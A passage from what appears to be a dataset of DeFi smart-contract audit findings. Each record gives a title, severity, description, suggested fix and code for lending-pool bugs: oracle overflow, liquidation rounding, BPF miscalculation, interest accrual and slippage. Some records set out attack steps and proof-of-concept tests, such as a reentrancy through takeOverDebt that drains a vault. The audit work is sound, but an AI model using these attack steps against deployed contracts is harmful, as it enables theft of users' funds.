full bonus.чLiquidators are not compensated for bad debt liquidations in some cases. Ante (liquidator bonus) is stuck in the borrower smart contract until bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead for these accounts to accumulate even bigger bad debt and lender depositors being unable to withdraw their funds from lender.ч```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User assets:\", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n emit log_named_uint(\"Liquidated User ante:\", address(account).balance);\\n }\\n```\\n -Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 doesчmediumчLooking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / 
denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to the intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are apart 24 hours (86400 seconds), this can lead to an overflow: Assume for simplicity `target - timeL = timeR - timeL`\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48`\\n```\\nчPerform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\nчThe corrupted return value affects the `Volatility` library. 
Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.ч```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n -The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debtчmediumчUsers face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` smaller than 1 results in the liquidator receiving a fraction of the user's collateral based on `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (with a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. 
Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly (\"memory-safe\") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan. This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.чConsider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, \"Zero repayment impact.\") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. 
This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).чUsers with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.ч```\\nassembly (\"memory-safe\") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n -Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty)чmediumч2.In _prepareTake() function,the BPF is calculated using vars.auctionPrice which is calculated by _auctionPrice() function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3.The _takeBucket() function made a judgment after _prepareTake()\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nso the root cause of this issue is that in a scenario where a user calls Deposit Take(params_.depositTake ==true) ,BPF will calculated base on vars_.auctionPrice instead of bucketPrice.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n params_.collateralScale,\\n 
vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\nчIn the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .чWrong auctionPrice used in calculating BFP which subsequently influences the _calculateTakeFlowsAndBondChange() and _rewardBucketTake() function will result in bias .\\nFollowing the example of the Whitepaper(section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129 The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772 )* 1100)} which is 18.3334 unit of ETH .Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18. 3334 · 1100 · 0. 008271889129 = 166. 8170374 𝐷𝐴𝐼. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementations: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4*0.011644 - 1/4 *0.010175 = 0.01201125. The collateral purchased is 18.368 unit of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974DAI Dave is awarded LPB in that bucket worth 18. 368 · 1100 · 0. 010175 = 205.58 𝐷𝐴𝐼.\\nSo,Dave earn more rewards(38.703 DAI) than he should have.\\nAs the Whitepaper says: \" the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. 
She also might be Dave, who is looking to ensure a return on his liquidation bond.\"ч```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n -Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` actionчmediumчThe Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the 
specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs showed in the above snippet, in cases where `TP >= NP` and `NP = price` (thus val = 0) the function won't set a value for `sign` (will be `0` by default) so that will result in a computed `BPF` of `0`, instead of `bondFactor` that would be the correct `BPF`.чChange the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\nчThe kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.ч```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= 
NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n -First pool borrower pays extra interestчmediumчFor any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. 
See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. 
Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.чIssue First pool borrower pays extra interest\\nWhen checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. 
To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\nчFirst borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.ч```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n -Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`чmediumчIn ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the 
borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. If `auctionPrice` results to be bigger than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued really high, the resulting prices at an auction can be so high that is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and it goes lower through time until 72 hours have passed. 
Also, `referencePrice` can be much higher than `MAX_PRICE`, as outlined in _kick:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE` so a `referencePrice` bigger than `MAX_PRICE` is totally possible.\\nIn auctions where `referencePrice` is bigger than `MAX_PRICE` and the auction is settled in a low time frame, `auctionPrice` will also be bigger than `MAX_PRICE` and that will cause the entire transaction to revert.чIt's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\nчWhen the above conditions are met, the auction won't be able to settle until `auctionPrice` lowers below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in assets valuation, there are no low-probability prerequisites and the impact will be a violation of the system design, as well as the potential losses for the kicker of that auction, so setting severity to be highч```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n -Adversary can reenter takeOverDebt() during liquidation to steal vault fundsчhighчFirst we'll walk through a high level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some 
time the position becomes liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lacks the nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nPosition still exists on the new address\\nAfter some time the position becomes liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here when the custom token is transferred, it gives control back to the attacker which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is because the actual borrowing storage state isn't modified until AFTER the control transfer. This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address behaving completely normally. 
After the repay() call resumes, _removeKeysAndClearStorage is called with the now deleted borrowKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of deleteKey is that it doesn't revert if the key doesn't exist. This allows \"removing\" keys from an empty array without reverting. This allows the repay call to finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt and any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand repay transfers the LP backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited and no new LP funds are added when the position is taken over. 
This causes a deficit in the vault since other users funds are being withdrawn from the vault.чAdd the `nonReentrant` modifier to `takeOverDebt()`чVault can be drainedч```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n -Creditor can maliciously burn UniV3 position to permanently lock fundsчhighчNonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Now assuming the NFT is burnt we can see how every method for repayment is now lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert. It cycles through each loan causing it to query ownerOf() for each token. As we know this reverts. 
The final result is that once this happens, there is no way possible to close the position.чI would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.чCreditor can maliciously lock all fundsч```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n}\\n```\\n -No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`чhighчThe absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidation and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, the number of `SaleTokemAmountOut` is gained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })` However, the `saleTokenAmountOut` is a dynamic number calculated on the current state of the blockchain, based on the calculations mentioned above. 
This will lead to the situation that the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the repayment of the user is sandwiched (frontrunned), the profit of the repayer is decreased till the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits(\"0.06\", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: 